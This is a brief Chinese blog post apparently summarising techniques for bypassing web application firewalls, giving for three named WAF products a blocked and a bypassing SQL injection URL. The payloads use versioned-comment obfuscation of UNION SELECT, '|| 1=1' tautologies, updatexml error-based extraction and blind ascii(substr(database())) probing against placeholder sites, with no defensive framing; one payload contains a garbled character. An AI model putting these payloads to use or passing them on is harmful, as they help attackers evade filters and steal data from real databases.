绕WAF手法总结

blackK_YC2023-10-30 20:58

云锁

被拦截

http://www.test123.com/article.php?id=1%20union%20select%201,2,3

绕过

http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

被拦截

http://www.xxx.com.cn/productshow.php?id=79'

绕过

http://www.xxx.com.cn/productshow.php?id=79 \|\| 1=1

WTSWAF

被拦截

http://www.xxx.com.cn/productshow.php?id=-79 \|\| updatexml(1,concat(0x7e,(sElEct�user()),0x7e),1)

绕过

http://www.xxx.com.cn/productshow.php?id=-79 \|\| and (ascii(substr(database(),1,1))%20=109)

上一篇：【查找算法】哈希查找

下一篇：windows应用软件扫描报告不告谱要钱

热门推荐

01UV安装并设置国内源 02A股预测还能更准？开源大模型Kronos带你跑通预测+回测全流程 03解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题 04UV 工具安装与国内镜像源配置指南 05KGG转MP3工具|非KGM文件|解密音频 06conda中设置镜像地址（附所有可换的地址）07教你如何认证 Gemini 教育优惠的二次验证，薅个 1年的 Gemini Pro 会员 082025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定完整成品思路模型代码分享，全网首发高质量！！！09突破百度网盘的下载限速，两种方法教会你【超详细】102025年数学建模国赛C题超详细解题思路